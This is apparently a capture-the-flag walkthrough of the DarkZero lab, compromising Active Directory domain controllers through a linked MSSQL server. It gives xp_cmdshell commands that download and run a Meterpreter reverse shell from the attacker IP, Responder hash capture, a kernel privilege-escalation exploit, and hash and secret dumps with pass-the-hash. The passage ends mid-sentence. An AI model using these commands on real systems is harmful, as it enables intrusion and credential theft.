
DarkZero

10.129.3.164

john.w:RFulUtONCOL!

Recon

nmap -vv -sVC -p- -oN nmap-initial 10.129.183.50
# Nmap scan report for 10.129.183.50
# Host is up, received echo-reply ttl 127 (0.031s latency).
# Scanned at 2025-10-05 15:13:34 CEST for 339s
# Not shown: 65512 filtered tcp ports (no-response)
# PORT      STATE SERVICE       REASON          VERSION
# 53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
# 88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-10-05 20:17:32Z)
# 135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
# 389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after:  2026-07-29T11:40:00
# | MD5:   ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# 445/tcp   open  microsoft-ds? syn-ack ttl 127
# 464/tcp   open  kpasswd5?     syn-ack ttl 127
# 593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
# 636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# |_ssl-date: TLS randomness does not represent time
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after:  2026-07-29T11:40:00
# | MD5:   ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# 1433/tcp  open  ms-sql-s      syn-ack ttl 127 Microsoft SQL Server 2022 16.00.1000.00; RC0+
# |_ssl-date: 2025-10-05T20:19:08+00:00; +6h59m55s from scanner time.
# | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
# | Issuer: commonName=SSL_Self_Signed_Fallback
# | Public Key type: rsa
# | Public Key bits: 3072
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-10-05T19:18:46
# | Not valid after:  2055-10-05T19:18:46
# | MD5:   636dcdadfc6088faeca100461f09d2da
# | SHA-1: 78df4b0d7e1cbbe401e6c390f419df8595056b6f
# | -----BEGIN CERTIFICATE-----
# | MIIEADCCAmigAwIBAgIQG9v4ecVQHatCHpmsth/72TANBgkqhkiG9w0BAQsFADA7
# | MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
# | bABsAGIAYQBjAGswIBcNMjUxMDA1MTkxODQ2WhgPMjA1NTEwMDUxOTE4NDZaMDsx
# | OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
# | AGwAYgBhAGMAazCCAaIwDQYJKoZIhvcNAQEBBQADggGPADCCAYoCggGBALluoV1L
# | LYJAOaHgSu9QgVaYyO5L/g787BKZTxrGMBtVqZ6w7UloGzGNjaf0MOmbNuFNPLY1
# | QbUll22daQnuhazWmyCa0CCCtzEZhYUEspu22HDmWiwzsGrqV+Rw27GthMXS2C90
# | 9VjmLX9VWEZ2MVlC7e1hXY3CyICfUeyU3LJZhgZLvnnYVogtbsSyDJM+q3lMYnX/
# | dBByupnKDHkVwy6T7vKlc/1Vt3SXDQ7l01so2I69BjwsB26jvwCWYxXVDiyLGtiJ
# | xnJ+3PwsJt2dZmnF2Zuk3Wch1lX1EptxBpzAZ5o0+FrzXGL8mjytsVBkORWBotCm
# | axInG5WLVOyV2TBY/oLLvN0fV0OAdoWzCmelDM3yoM58MN0jkarN6Mc6actPxSD4
# | aZ1foVy87h4CMmheLit9yJVie5u/aoU5xE4tDO1BY9gywgMZ0ig7cCQ9jsvVWmeW
# | +IoAZbMaqMANGjHqYfKuBpSjNVPdRMd9Rn1dGIs2uv6zfzsHsXcx6wuy1QIDAQAB
# | MA0GCSqGSIb3DQEBCwUAA4IBgQCzCfanQ7JNqH2xP+14XVDhzJiTZZKV/gRdbrNk
# | IiCMHCOpq8NZ7I66ZZpVRwQfw23sNpJ84nEt5enNi5krgwyEDCgT2FFbckonIo9o
# | UqhCRmqZhqJIbG9Qm2QjHfdF7gYRLt/Asv0KFyAzuMkszwp/W75fxJlvD6QRTyFM
# | KQTmN/rIO1kQwQ9nSemR4/1rZUkf4QEVF+aMByhrj2+6QCZC1ND128Mk/8i34wV9
# | iM9iEjBry1klSinsePGtBcA4i+X5LbMHXLUP1dtSYQtO4IssvXA1RCW99ZtKYxTi
# | ZpcQm6cxdMDWosBA4p20sNyOC9LWSFBPogUslSj9YGVDpksS0/bD1LJFQIOjfk4D
# | Zoj+HS1I+qsP2PoLldW51LbHGCxQnxprY3fWvzRrlkfMRe4kPjTvKGmwKm+uw5fl
# | Q04dwqzczCA5PYqJ8KTuP5y2eab178IrYoHMcxr84iZMf+So6HZf1gR5T84Y2SpY
# | naBEAhwf2GK7QI4+P/0jvvCbf9k=
# |_-----END CERTIFICATE-----
# |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
# |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
# 2179/tcp  open  vmrdp?        syn-ack ttl 127
# 3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after:  2026-07-29T11:40:00
# | MD5:   ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# |_ssl-date: TLS randomness does not represent time
# 3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: darkzero.htb0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC01.darkzero.htb
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.darkzero.htb
# | Issuer: commonName=darkzero-DC01-CA/domainComponent=darkzero
# | Public Key type: rsa
# | Public Key bits: 2048
# | Signature Algorithm: sha256WithRSAEncryption
# | Not valid before: 2025-07-29T11:40:00
# | Not valid after:  2026-07-29T11:40:00
# | MD5:   ce571ac8da76eb62efe84e85045bd440
# | SHA-1: 603af638aabb7eaa1bdb425658694de298b6570c
# |_ssl-date: TLS randomness does not represent time
# 5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
# 49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 49670/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 49671/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
# 49891/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 49908/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 55968/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# 60342/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
# Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
#
# Host script results:
# |_clock-skew: mean: 6h59m55s, deviation: 0s, median: 6h59m54s
# | p2p-conficker:
# |   Checking for Conficker.C or higher...
# |   Check 1 (port 47592/tcp): CLEAN (Timeout)
# |   Check 2 (port 44145/tcp): CLEAN (Timeout)
# |   Check 3 (port 4598/udp): CLEAN (Timeout)
# |   Check 4 (port 25274/udp): CLEAN (Timeout)
# |_  0/4 checks are positive: Host is CLEAN or ports are blocked
# | smb2-time:
# |   date: 2025-10-05T20:18:29
# |_  start_date: N/A
# | smb2-security-mode:
# |   311:
# |_    Message signing enabled and required
#
# Read data files from: /usr/bin/../share/nmap
# Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct  5 15:19:13 2025 -- 1 IP address (1 host up) scanned in 339.24 seconds

User

Enumerating services

Looking at the ports, there are some interesting configurations.

Let's look through the different services with netexec:

nxc smb "$IP" -u $USER -p $PASSWORD --shares
# SMB         10.129.183.50   445    DC01             [*] Windows 11 / Server 2025 Build 26100 x64 (name:DC01) (domain:darkzero.htb) (signing:True) (SMBv1:False)
# SMB         10.129.183.50   445    DC01             [+] darkzero.htb\john.w:RFulUtONCOL!
# SMB         10.129.183.50   445    DC01             [*] Enumerated shares
# SMB         10.129.183.50   445    DC01             Share           Permissions     Remark
# SMB         10.129.183.50   445    DC01             -----           -----------     ------
# SMB         10.129.183.50   445    DC01             ADMIN$                          Remote Admin
# SMB         10.129.183.50   445    DC01             C$                              Default share
# SMB         10.129.183.50   445    DC01             IPC$            READ            Remote IPC
# SMB         10.129.183.50   445    DC01             NETLOGON        READ            Logon server share
# SMB         10.129.183.50   445    DC01             SYSVOL          READ            Logon server share
nxc ldap "$IP" -u $USER -p $PASSWORD
# LDAP        10.129.183.50   389    DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
# LDAPS       10.129.183.50   636    DC01             [+] darkzero.htb\john.w:RFulUtONCOL!

Let's run BloodHound. For the collector I'm going to use rusthound (first time trying it), because nxc ldap's bloodhound feature doesn't resolve here: for some DNS reason it tries to resolve the internal IP of DC01.

rusthound -d "DARKZERO.HTB" -u "john.w@DARKZERO.HTB" -p 'RFulUtONCOL!' --zip --ldaps --adcs
# ---------------------------------------------------
# Initializing RustHound at 16:30:56 on 02/14/26
# Powered by g0h4n from OpenCyber
# ---------------------------------------------------
#
# [2026-02-14T15:30:56Z INFO  rusthound] Verbosity level: Info
# [2026-02-14T15:30:56Z INFO  rusthound::ldap] Connected to DARKZERO.HTB Active Directory!
# [2026-02-14T15:30:56Z INFO  rusthound::ldap] Starting data collection...
# [2026-02-14T15:30:57Z INFO  rusthound::ldap] All data collected for NamingContext DC=DARKZERO,DC=HTB
# [2026-02-14T15:30:57Z INFO  rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=DARKZERO,DC=HTB
# [2026-02-14T15:30:57Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
# [2026-02-14T15:30:57Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
# ⢀ Parsing LDAP objects: 29%                                                                                                                                                                                         [2026-02-14T15:30:57Z INFO  rusthound::modules::adcs::parser] Found 11 enabled certificate templates
# [2026-02-14T15:30:57Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
# [2026-02-14T15:30:57Z INFO  rusthound::json::checker] Starting checker to replace some values...
# [2026-02-14T15:30:57Z INFO  rusthound::json::checker] Checking and replacing some values finished!
# [2026-02-14T15:30:57Z INFO  rusthound::modules] Starting checker for ADCS values...
# [2026-02-14T15:33:12Z ERROR rusthound::modules::adcs::checker] Couldn't connect to server http://DC01.darkzero.htb/certsrv/, please try manually and check for https access if EPA is enable.
# [2026-02-14T15:33:12Z INFO  rusthound::modules] Checking for ADCS values finished!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 6 users parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 64 groups parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 1 computers parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 1 ous parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 1 domains parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 2 gpos parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 21 containers parsed!
# [2026-02-14T15:33:12Z INFO  rusthound::json::maker] 1 cas parsed!
# [2026-02-14T15:33:13Z INFO  rusthound::json::maker] 33 templates parsed!
# [2026-02-14T15:33:13Z INFO  rusthound::json::maker] .//20260214163312_darkzero-htb_rusthound.zip created!
#
# RustHound Enumeration Completed at 16:33:13 on 02/14/26! Happy Graphing!

I looked through a lot of ACLs but nothing stands out, though we can note that our Domain Users can enroll with the darkzero-DC01-CA.

Perhaps a CA misconfiguration to revisit later. Looking at the other services, we have MSSQL.

Gaining RCE on a linked server in MSSQL

nxc mssql "$IP" -u $USER -p $PASSWORD
# MSSQL       10.129.77.157   1433   DC01             [*] Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)
# MSSQL       10.129.77.157   1433   DC01             [+] darkzero.htb\john.w:RFulUtONCOL!
mssqlclient.py -windows-auth 'DARKZERO.HTB/john.w:RFulUtONCOL!@10.129.77.157'

Not enough privileges for xp_cmdshell on DC01, but there is a linked server on which our login maps to sysadmin:

SELECT srvname, isremote FROM sysservers
-- srvname             isremote
-- -----------------   --------
-- DC01                       1
--
-- DC02.darkzero.ext          0
--
EXEC('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [DC02.darkzero.ext]
--
-- -   -   -   -
-- 1   1   1   1

Let's use this to enable xp_cmdshell and execute a command to check if it works:

exec('exec sp_configure ''show advanced options'', 1; reconfigure;') at [dc02.darkzero.ext]
exec('exec sp_configure ''xp_cmdshell'', 1; reconfigure;') at [dc02.darkzero.ext]
exec('xp_cmdshell ''whoami''') at [dc02.darkzero.ext]
-- --------------------
-- darkzero-ext\svc_sql

Amazing. Let's try to capture the hash of the account the SQL service runs as; start Responder:

responder -I "tun0"
#    SMB server                 [ON]
#    Responder IP               [10.10.14.188]

Then let's use xp_dirtree to make the linked server's SQL service connect to our Responder SMB listener:

EXEC ('xp_dirtree ''\\10.10.14.188\share''') AT [DC02.darkzero.ext]
responder -I tun0
# [SMB] NTLMv2-SSP Client   : 10.129.77.157
# [SMB] NTLMv2-SSP Username : darkzero-ext\svc_sql
# [SMB] NTLMv2-SSP Hash     : svc_sql::darkzero-ext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

I tried to crack it with hashcat (mode 5600) with no luck, so let's get a shell instead.

I first tried common reverse-shell payloads, but because we are going through EXEC (...) AT [...], commands longer than 128 characters don't work. Our best option is therefore to upload a payload and execute it; there are many options, but let's just go for Meterpreter.

Before that, let's set up ligolo-ng to gain access to the internal network of this new machine; maybe we can then use WinRM, RDP or something more stable:

ligolo-ng -selfcert # Listens on :11601

Send agent.exe to the box and run it:

EXEC ('xp_cmdshell ''powershell -c "Invoke-WebRequest -Uri http://10.10.14.207/agent.exe -OutFile C:\Users\svc_sql\Desktop\agent.exe"''') AT [DC02.darkzero.ext]
EXEC ('xp_cmdshell ''powershell -c "C:\Users\svc_sql\Desktop\agent.exe -connect 10.10.14.207:11601 -ignore-cert"''') AT [DC02.darkzero.ext]

This worked, let's look at this new machine.

Exploring DC02@DARKZERO.EXT

nmap -sVC -Pn -p- 172.16.20.2
# Starting Nmap 7.93 ( https://nmap.org ) at 2025-10-07 16:48 CEST
# Nmap scan report for DARKZERO.EXT (172.16.20.2)
# Host is up (0.045s latency).
# Not shown: 65509 filtered tcp ports (no-response)
# PORT      STATE SERVICE       VERSION
# 53/tcp    open  domain        Simple DNS Plus
# 88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-07 21:53:30Z)
# 135/tcp   open  msrpc         Microsoft Windows RPC
# 139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
# 389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after:  2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 445/tcp   open  microsoft-ds?
# 464/tcp   open  kpasswd5?
# 593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
# 636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after:  2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 1433/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RC0+
# |_ssl-date: 2025-10-07T21:55:07+00:00; +6h59m57s from scanner time.
# |_ms-sql-info: ERROR: Script execution failed (use -d to debug)
# |_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
# | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
# | Not valid before: 2025-10-07T14:48:48
# |_Not valid after:  2055-10-07T14:48:48
# 3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after:  2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: darkzero.ext0., Site: Default-First-Site-Name)
# | ssl-cert: Subject: commonName=DC02.darkzero.ext
# | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC02.darkzero.ext
# | Not valid before: 2025-07-29T14:22:49
# |_Not valid after:  2026-07-29T14:22:49
# |_ssl-date: TLS randomness does not represent time
# 5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 9389/tcp  open  mc-nmf        .NET Message Framing
# 47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
# |_http-server-header: Microsoft-HTTPAPI/2.0
# |_http-title: Not Found
# 49664/tcp open  msrpc         Microsoft Windows RPC
# 49665/tcp open  msrpc         Microsoft Windows RPC
# 49666/tcp open  msrpc         Microsoft Windows RPC
# 49667/tcp open  msrpc         Microsoft Windows RPC
# 49668/tcp open  msrpc         Microsoft Windows RPC
# 65181/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
# 65192/tcp open  msrpc         Microsoft Windows RPC
# 65197/tcp open  msrpc         Microsoft Windows RPC
# 65202/tcp open  msrpc         Microsoft Windows RPC
# 65231/tcp open  msrpc         Microsoft Windows RPC
# 65256/tcp open  msrpc         Microsoft Windows RPC
# Service Info: Host: DC02; OS: Windows; CPE: cpe:/o:microsoft:windows
#
# Host script results:
# | smb2-security-mode:
# |   311:
# |_    Message signing enabled and required
# |_clock-skew: mean: 6h59m56s, deviation: 0s, median: 6h59m55s
# | smb2-time:
# |   date: 2025-10-07T21:54:26
# |_  start_date: N/A
# |_nbstat: NetBIOS name: DC02, NetBIOS user: <unknown>, NetBIOS MAC: 00155df25c01 (Microsoft)

This is again a classic domain controller, nothing unusual. We are now in a new domain, DARKZERO.EXT. I couldn't find anything of use through the services, so let's get a Meterpreter shell going.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.207 LPORT=4444 -f exe > shell.exe
python3 -m http.server 80

# In another shell start the listener
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 4444
run

Then let's upload it:

EXEC ('xp_cmdshell ''powershell -c "Invoke-WebRequest -Uri http://10.10.14.207/shell.exe -OutFile C:\Users\svc_sql\Desktop\shell.exe"''') AT [DC02.darkzero.ext]
EXEC ('xp_cmdshell ''powershell -c "C:\Users\svc_sql\Desktop\shell.exe"''') AT [DC02.darkzero.ext]

And we receive a connection; let's scan the host:

# [*] Started reverse TCP handler on 0.0.0.0:4444
# [*] Sending stage (203846 bytes) to 10.129.3.65
# [*] Meterpreter session 1 opened (10.10.14.207:4444 -> 10.129.3.65:63598) at 2026-02-14 15:51:00 +0100

# meterpreter >

I explored the host for a bit, and then decided to take advantage of the Meterpreter session to run multi/recon/local_exploit_suggester. It's pretty noisy, but it quickly runs a bunch of exploit checks and finds possible vulnerabilities without much effort:

# Background session 1? [y/N]
use multi/recon/local_exploit_suggester
set SESSION 1
run
# [*] 172.16.20.2 - Collecting local exploits for x64/windows...
# [*] 172.16.20.2 - 203 exploit checks are being tried...
# [+] 172.16.20.2 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/cve_2022_21882_win32k: The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
# [+] 172.16.20.2 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
# [+] 172.16.20.2 - exploit/windows/local/cve_2023_28252_clfs_driver: The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
# [+] 172.16.20.2 - exploit/windows/local/cve_2024_30088_authz_basep: The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
# [+] 172.16.20.2 - exploit/windows/local/cve_2024_35250_ks_driver: The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
# [+] 172.16.20.2 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
# [*] Running check method for exploit 48 / 48
# [*] 172.16.20.2 - Valid modules for session 6:
# ============================
#
#  #   Name                                                           Potentially Vulnerable?  Check Result
#  -   ----                                                           -----------------------  ------------
#  1   exploit/windows/local/bypassuac_dotnet_profiler                Yes                      The target appears to be vulnerable.
#  2   exploit/windows/local/bypassuac_sdclt                          Yes                      The target appears to be vulnerable.
#  3   exploit/windows/local/cve_2022_21882_win32k                    Yes                      The service is running, but could not be validated. May be vulnerable, but exploit not tested on Windows Server 2022
#  4   exploit/windows/local/cve_2022_21999_spoolfool_privesc         Yes                      The target appears to be vulnerable.
#  5   exploit/windows/local/cve_2023_28252_clfs_driver               Yes                      The target appears to be vulnerable. The target is running windows version: 10.0.20348.0 which has a vulnerable version of clfs.sys installed by default
#  6   exploit/windows/local/cve_2024_30088_authz_basep               Yes                      The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
#  7   exploit/windows/local/cve_2024_35250_ks_driver                 Yes                      The target appears to be vulnerable. ks.sys is present, Windows Version detected: Windows Server 2022
#  8   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.

We have a bunch of hits. Let's ignore the ones that are "not validated"; after testing a couple of the others, I found that CVE-2024-30088 works:

use exploit/windows/local/cve_2024_30088_authz_basep
info
# Name: Windows Kernel Time of Check Time of Use LPE in AuthzBasepCopyoutInternalSecurityAttributes
# Provided by:
#   tykawaii98
#   jheysel-r7

# Description:
#   CVE-2024-30088 is a Windows Kernel Elevation of Privilege Vulnerability which affects many recent versions of Windows 10,
#   Windows 11 and Windows Server 2022.
#
#   The vulnerability exists inside the function called `AuthzBasepCopyoutInternalSecurityAttributes` specifically when
#   the kernel copies the `_AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION` of the current token object to user mode. When the
#   kernel preforms the copy of the `SecurityAttributesList`, it sets up the list of the SecurityAttribute's structure
#   directly to the user supplied pointed. It then calls `RtlCopyUnicodeString` and
#   `AuthzBasepCopyoutInternalSecurityAttributeValues` to copy out the names and values of the `SecurityAttribute` leading
#   to multiple Time Of Check Time Of Use (TOCTOU) vulnerabilities in the function.
#
# References:
#   https://github.com/tykawaii98/CVE-2024-30088
#   https://nvd.nist.gov/vuln/detail/CVE-2024-30038

set SESSION 4
set LHOST 10.10.14.188
run
# [*] Started reverse TCP handler on 10.10.14.188:4444
# [*] Running automatic check ("set AutoCheck false" to disable)
# [+] The target appears to be vulnerable. Version detected: Windows Server 2022. Revision number detected: 2113
# [*] Reflectively injecting the DLL into 2992...
# [+] The exploit was successful, reading SYSTEM token from memory...
# [+] Successfully stole winlogon handle: 824
# [+] Successfully retrieved winlogon pid: 592
# [*] Sending stage (203846 bytes) to 10.129.67.213
# [*] Meterpreter session 5 opened (10.10.14.188:4444 -> 10.129.67.213:51908) at 2025-10-07 20:58:11 +0200

meterpreter > getuid
# Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:6963aad8ba1150192f3ca6341355eb49:::
# Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
# krbtgt:502:aad3b435b51404eeaad3b435b51404ee:43e27ea2be22babce4fbcff3bc409a9d:::
# svc_sql:1103:aad3b435b51404eeaad3b435b51404ee:816ccb849956b531db139346751db65f:::
# DC02$:1000:aad3b435b51404eeaad3b435b51404ee:663a13eb19800202721db4225eadc38e:::
# darkzero$:1105:aad3b435b51404eeaad3b435b51404ee:4276fdf209008f4988fa8c33d65a2f94:::

Amazing! Let's get the user.txt flag:

cd C:\Users\Administrator\Desktop
type user.txt
# <redacted>

Root

I tried to cracking the hashes with no luck, so let's focus on the inter-forest relationship between DARKZERO.HTB and DARKZERO.EXT. First, let's confirm our Administrator access to DC02:

nxc winrm "172.16.20.2" -u "Administrator" -H "6963aad8ba1150192f3ca6341355eb49"
# WINRM       172.16.20.2     5985   DC02             [*] Windows Server 2022 Build 20348 (name:DC02) (domain:darkzero.ext)
# WINRM       172.16.20.2     5985   DC02             [+] darkzero.ext\Administrator:6963aad8ba1150192f3ca6341355eb49 (admin)

Ok, let's run a BloodHound collection. I'm not using rusthound this time since it doesn't support NT hashes; nxc ldap works instead:

faketime "$(rdate -n 172.16.20.2 -p | awk '{print $2, $3, $4}' | date -f - "+%Y-%m-%d %H:%M:%S")" zsh
nxc ldap "172.16.20.2" -u "Administrator" -H "6963aad8ba1150192f3ca6341355eb49" --bloodhound -c All --dns-server 172.16.20.2
# LDAP        172.16.20.2     389    DC02             [*] Windows Server 2022 Build 20348 (name:DC02) (domain:darkzero.ext) (signing:None) (channel binding:Never)
# LDAP        172.16.20.2     389    DC02             [+] darkzero.ext\Administrator:6963aad8ba1150192f3ca6341355eb49 (admin)
# LDAP        172.16.20.2     389    DC02             Resolved collection methods: session, group, dcom, rdp, objectprops, trusts, acl, container, localadmin, psremote
# LDAP        172.16.20.2     389    DC02             Done in 0M 8S
# LDAP        172.16.20.2     389    DC02             Compressing output into /root/.nxc/logs/DC02_172.16.20.2_2026-02-14_161218_bloodhound.zip

Ok, let's get more details about this relationship: we upload PowerView and check the trusts:

Import-Module .\PowerView.ps1
Get-DomainTrust

# SourceName      : darkzero.ext
# TargetName      : darkzero.htb
# TrustType       : WINDOWS_ACTIVE_DIRECTORY
# TrustAttributes : FOREST_TRANSITIVE
# TrustDirection  : Bidirectional
# WhenCreated     : 7/29/2025 3:30:19 PM
# WhenChanged     : 2/14/2026 12:30:11 PM

One interesting thing is that Administrator@DARKZERO.EXT is a member of "Group Policy Creator Owners", hinting at potential GPO abuse, though being able to create GPOs without being able to link them is not useful on its own.

I explored this GPO abuse idea a bit more, but there seem to be no interesting pre-existing GPOs and no user that can link one.

I enumerated the users of both domains a bit more; there don't seem to be any interesting trusts or users that we could abuse to pivot between forests.

Looking for other attack vectors, I tried the classic tools:

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "lsadump::secrets" "exit"
#
#   .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
#  .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
#  ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
#  ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
#  '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
#   '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/
#
# mimikatz(commandline) # privilege::debug
# Privilege '20' OK
#
# <SNIP>
#
# Secret  : _SC_MSSQLSERVER / service 'MSSQLSERVER' with username : darkzero-ext\svc_sql
# cur/text: enTRanDiVec!
#
# Secret  : _SC_SQLTELEMETRY / service 'SQLTELEMETRY' with username : NT Service\SQLTELEMETRY
#
# mimikatz(commandline) # exit

We got the credentials for svc_sql (svc_sql:enTRanDiVec!), ok.

Since we are NT AUTHORITY\SYSTEM and this is a multi-machine AD environment, I started looking for traffic on the network. I first used Inveigh since I'm more used to it. I suspected coercion might be possible, though I struggled to get anything to appear in Inveigh. It seemed I might be able to coerce DC01$ into connecting to DC02; I tried PetitPotam and got entries in Inveigh, proving the technique was working, but for some reason no TGTs appeared. I then looked for alternatives and saw that Rubeus can do TGT monitoring:

